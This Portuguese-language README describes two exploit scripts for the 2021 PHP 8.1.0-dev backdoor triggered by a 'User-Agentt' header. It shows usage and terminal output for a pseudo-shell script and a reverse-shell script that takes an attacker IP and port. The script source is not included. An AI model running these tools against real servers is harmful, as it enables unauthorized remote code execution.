
Script de Shell do Sistema com Backdoor PHP 8.1.0-dev
Script de Shell de Sistema com Backdoor no PHP 8.1.0-dev

A versão 8.1.0-dev do PHP foi lançada com um backdoor em 28 de março de 2021, mas o backdoor foi rapidamente descoberto e removido. Se esta versão do PHP estiver em execução em um servidor, um atacante pode executar código arbitrário enviando o cabeçalho User-Agentt.
O código original foi restaurado após o problema ser descoberto, mas depois foi adulterado uma segunda vez. A violação teria criado um backdoor em qualquer site que executasse a versão comprometida do PHP, permitindo que invasores realizassem execução remota de código no site.
Leia o artigo completo: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Este pequeno script de exploit backdoor_php_8.1.0-dev.py utiliza o backdoor para fornecer um pseudo shell de sistema no host. Encontre-o no Exploit DB.
Uso:
┌──(user㉿kali)-[~/Documents]
└─$ python3 backdoor_php_8.1.0-dev.py
Enter the host url:
http://a.b.c.d
Interactive shell is opened on http://a.b.c.d
Can't acces tty; job crontol turned off.
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
Este pequeno script de exploit revshell_php_8.1.0-dev.py fornece um shell reverso no alvo.
Uso:
┌──(user㉿kali)-[~/Documents]
└─$ python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>

Seja Curioso, Aprender é Vida! 😃